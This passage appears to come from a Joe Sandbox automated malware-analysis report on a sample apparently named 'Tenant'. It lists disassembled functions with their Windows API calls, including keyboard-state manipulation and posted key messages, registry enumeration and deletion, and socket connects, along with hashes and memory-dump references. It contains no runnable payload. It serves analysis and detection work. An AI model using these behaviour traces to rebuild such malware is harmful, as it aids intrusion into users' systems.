                                                                                        • Instruction ID: 7b58e3a06dff5e3a78f8f08f4d3ea2257c220f41b3be3f56c5f1e8d05342bde4
                                                                                        • Opcode Fuzzy Hash: 8fc85140e94204779a9d8b495fb6b8fff46133f46ff5e5b91e4e2b6c5ba1d31e
                                                                                        • Instruction Fuzzy Hash: CE61B175A00619DFCF14EFA4C5919AEBBF5FF49310F1485A9E806AB391CB30AD81CB94
                                                                                        Function 00B0174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00B0178B
                                                                                        • GetKeyboardState.USER32(?), ref: 00B017A0
                                                                                        • SetKeyboardState.USER32(?), ref: 00B01801
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0182F
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0184E
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B01894
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B018B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 68b6b64487d4bc8b4a7982fd9e8aa98ec1a8d2aedacfdc48b5f678c2ab526c4f
                                                                                        • Instruction ID: f62ef9434b6f60f78bff76f97cd416dc7b607e25e3e8ab8181b4a7cafc76ff48
                                                                                        • Opcode Fuzzy Hash: 68b6b64487d4bc8b4a7982fd9e8aa98ec1a8d2aedacfdc48b5f678c2ab526c4f
                                                                                        • Instruction Fuzzy Hash: 4B51E5A0A087D53DFB3A862CCC55BBA7EE9AF06300F088DC9E0D5468D2D694ED94D760
                                                                                        Function 00B01565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00B015A4
                                                                                        • GetKeyboardState.USER32(?), ref: 00B015B9
                                                                                        • SetKeyboardState.USER32(?), ref: 00B0161A
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B01646
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B01663
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B016A7
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B016C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: ba32f50de7e10102a0b8b3e4d3ebc777b39dd7a4348277a7650175341b571a5c
                                                                                        • Instruction ID: 3f8bd9a0276847efb7fb284f5506b24418be3ef0ff876daa86958d6530de106a
                                                                                        • Opcode Fuzzy Hash: ba32f50de7e10102a0b8b3e4d3ebc777b39dd7a4348277a7650175341b571a5c
                                                                                        • Instruction Fuzzy Hash: 9A51E5A06047D53DFB3A8728CC55BBA7EE9AF06300F0C4DC9E0D95A8D2C695EC98E750
                                                                                        Function 00B05BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 4bc04ac349d439906ab9cf2aff59fdb9337e791d924bf1ad7e124083b8e2b1f2
                                                                                        • Instruction ID: e6c5c013f2a4433a27452152d5e0e362ff9737a9dc60f0e352961171fea88e80
                                                                                        • Opcode Fuzzy Hash: 4bc04ac349d439906ab9cf2aff59fdb9337e791d924bf1ad7e124083b8e2b1f2
                                                                                        • Instruction Fuzzy Hash: A4418166C2061875CB21EBB4CD4AECFB7B8EF04310F51896AF509E3161E634A715C7A9
                                                                                        Function 00B03B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03B8A,?), ref: 00B04BE0
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03B8A,?), ref: 00B04BF9
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00B03BAA
                                                                                        • _wcscmp.LIBCMT ref: 00B03BC6
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B03BDE
                                                                                        • _wcscat.LIBCMT ref: 00B03C26
                                                                                        • SHFileOperationW.SHELL32(?), ref: 00B03C92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1377345388-1173974218
                                                                                        • Opcode ID: 1a6f0b42561f0530f76a294dcd2ac0cb7d80f6be21579a05c5abaa7baffed8d5
                                                                                        • Instruction ID: d144a0cbe7ac6281615111499e238aa120a14473dbe62d467c57f42f1e90c11a
                                                                                        • Opcode Fuzzy Hash: 1a6f0b42561f0530f76a294dcd2ac0cb7d80f6be21579a05c5abaa7baffed8d5
                                                                                        • Instruction Fuzzy Hash: 32416D71508345AAC752EB64C485ADBBBECEF89740F5009AEF48AC3191EB34D688C752
                                                                                        Function 00B278B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B278CF
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27976
                                                                                        • IsMenu.USER32(?), ref: 00B2798E
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B279D6
                                                                                        • DrawMenuBar.USER32 ref: 00B279E9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 3866635326-4108050209
                                                                                        • Opcode ID: 0b788126283761f46813f6db0e4f3d547d93256626906097b5a527c767bf0b8a
                                                                                        • Instruction ID: 4f8f11a4e8a85d8d90edae5e586b33de28e4d036cadce84105cc8d23944d13d2
                                                                                        • Opcode Fuzzy Hash: 0b788126283761f46813f6db0e4f3d547d93256626906097b5a527c767bf0b8a
                                                                                        • Instruction Fuzzy Hash: D6416B71A04319EFDB10DF94E884E9ABBF5FF05310F0481A9E95997250CB74AD90CFA1
                                                                                        Function 00B21602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B21631
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2165B
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B21712
                                                                                          • Part of subcall function 00B21602: RegCloseKey.ADVAPI32(?), ref: 00B21678
                                                                                          • Part of subcall function 00B21602: FreeLibrary.KERNEL32(?), ref: 00B216CA
                                                                                          • Part of subcall function 00B21602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B216ED
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B216B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        • Opcode ID: 09d53224b0c883531ac25ad5c6c55bf9e3c0342ea90f37b726ddd528cf885688
                                                                                        • Instruction ID: 56e5b9a07b49f75d98acfb6764337dfcd722461366f83c8abf1ae7bcbebe7864
                                                                                        • Opcode Fuzzy Hash: 09d53224b0c883531ac25ad5c6c55bf9e3c0342ea90f37b726ddd528cf885688
                                                                                        • Instruction Fuzzy Hash: D8316BB191011CBFDB199F94EC99EFFB7BCEF18300F1005A9E505A3150EA709E459BA0
                                                                                        Function 00B268F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B26911
                                                                                        • GetWindowLongW.USER32(01125678,000000F0), ref: 00B26944
                                                                                        • GetWindowLongW.USER32(01125678,000000F0), ref: 00B26979
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B269AB
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B269D5
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00B269E6
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B26A00
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: 72b648bb8241f4ac2d1d6e0880e6a87c631fc21cf5517c68c9214481e2ee4bb5
                                                                                        • Instruction ID: 991d727abf3efff01c3461b7f878cbb64b00bbb6e641b391a7eea339f2a8abfd
                                                                                        • Opcode Fuzzy Hash: 72b648bb8241f4ac2d1d6e0880e6a87c631fc21cf5517c68c9214481e2ee4bb5
                                                                                        • Instruction Fuzzy Hash: 7A311330654160AFDB21DF19EC99F6937E1FB8A714F2901A4F5188B2B1CF72AC80DB90
                                                                                        Function 00AFE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE2CA
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE2F0
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AFE2F3
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AFE311
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00AFE31A
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00AFE33F
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AFE34D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 9b38009a241c66ccdb567882f8578fabc9b28686e5bb00b92de90356e69b207b
                                                                                        • Instruction ID: fdff49ad2734fb387545f5e12b0d957bf482e09d76065580445b173cfb5c0201
                                                                                        • Opcode Fuzzy Hash: 9b38009a241c66ccdb567882f8578fabc9b28686e5bb00b92de90356e69b207b
                                                                                        • Instruction Fuzzy Hash: 5221417660421DAF9F10EFA8DC88DBE77BCEF09760B548129FA14DB260DA70AD458760
                                                                                        Function 00B1685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B18475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B184A0
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B168B1
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B168C0
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B168F9
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00B16902
                                                                                        • WSAGetLastError.WSOCK32 ref: 00B1690C
                                                                                        • closesocket.WSOCK32(00000000), ref: 00B16935
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B1694E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 910771015-0
                                                                                        • Opcode ID: 040cff1ce8bcd9a658e3d31c627f40d7a539be689d8d0445bed555219a4deb00
                                                                                        • Instruction ID: 2d438766ae579b95779d163f0c01ff404c0faa92915ceac1d96b5bc2faae17ea
                                                                                        • Opcode Fuzzy Hash: 040cff1ce8bcd9a658e3d31c627f40d7a539be689d8d0445bed555219a4deb00
                                                                                        • Instruction Fuzzy Hash: F831C271600208AFDB10AF64CC85BFE77E9EF49760F544069FD05AB291CB74AC448BA1
                                                                                        Function 00AFE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE3A5
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AFE3CB
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AFE3CE
                                                                                        • SysAllocString.OLEAUT32 ref: 00AFE3EF
                                                                                        • SysFreeString.OLEAUT32 ref: 00AFE3F8
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00AFE412
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AFE420
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 1f290abe32cc6b190817553e33274da77769af47b9564e8fa2db14c35822a6fb
                                                                                        • Instruction ID: c46430ff599f8e4ba5495679174884933cdfcac569e8b8bf14c52100f27fa9ba
                                                                                        • Opcode Fuzzy Hash: 1f290abe32cc6b190817553e33274da77769af47b9564e8fa2db14c35822a6fb
                                                                                        • Instruction Fuzzy Hash: E5215835604108AF9B10EFE8DC89DBE77ECEF093607108529FA15CB271DA75ED418764
                                                                                        Function 00B27BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                          • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                          • Part of subcall function 00AA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B27C57
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B27C64
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B27C6F
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B27C7E
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B27C8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: eb55f4644463ad05ef9cda9c6bc230b2a684a76f6ce6303af51da8c9452c83bb
                                                                                        • Instruction ID: 7965b1d5ed33c275a673a3dda6e28f3e2c6282e03f9b3faefc688865d38cce10
                                                                                        • Opcode Fuzzy Hash: eb55f4644463ad05ef9cda9c6bc230b2a684a76f6ce6303af51da8c9452c83bb
                                                                                        • Instruction Fuzzy Hash: 6011B6B1150219BFEF159F60DC85EE77F5DEF08758F014114BA08A2090CB719C21DBA4
                                                                                        Function 00AC9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00AC9D16
                                                                                          • Part of subcall function 00AC33B7: EncodePointer.KERNEL32(00000000), ref: 00AC33BA
                                                                                          • Part of subcall function 00AC33B7: __initp_misc_winsig.LIBCMT ref: 00AC33D5
                                                                                          • Part of subcall function 00AC33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00ACA0D0
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00ACA0E4
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00ACA0F7
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00ACA10A
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00ACA11D
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00ACA130
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00ACA143
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00ACA156
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00ACA169
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00ACA17C
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00ACA18F
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00ACA1A2
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00ACA1B5
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00ACA1C8
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00ACA1DB
                                                                                          • Part of subcall function 00AC33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00ACA1EE
                                                                                        • __mtinitlocks.LIBCMT ref: 00AC9D1B
                                                                                        • __mtterm.LIBCMT ref: 00AC9D24
                                                                                          • Part of subcall function 00AC9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AC9D29,00AC7EFD,00B5CD38,00000014), ref: 00AC9E86
                                                                                          • Part of subcall function 00AC9D8C: _free.LIBCMT ref: 00AC9E8D
                                                                                          • Part of subcall function 00AC9D8C: DeleteCriticalSection.KERNEL32(00B60C00,?,?,00AC9D29,00AC7EFD,00B5CD38,00000014), ref: 00AC9EAF
                                                                                        • __calloc_crt.LIBCMT ref: 00AC9D49
                                                                                        • __initptd.LIBCMT ref: 00AC9D6B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AC9D72
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 3567560977-0
                                                                                        • Opcode ID: f8ba367531672169db8c7e827ae8041c87f59bbf636b0e9fa527c1316a1e5e52
                                                                                        • Instruction ID: 9e36d046ae34f556cdad15ec07a50cf8fd49accb6045af514b911d7fc01a5f8e
                                                                                        • Opcode Fuzzy Hash: f8ba367531672169db8c7e827ae8041c87f59bbf636b0e9fa527c1316a1e5e52
                                                                                        • Instruction Fuzzy Hash: 87F06D325197116AE7357B787D0BF8B26D4DF41770F23461DF462E60D2EF1089014195
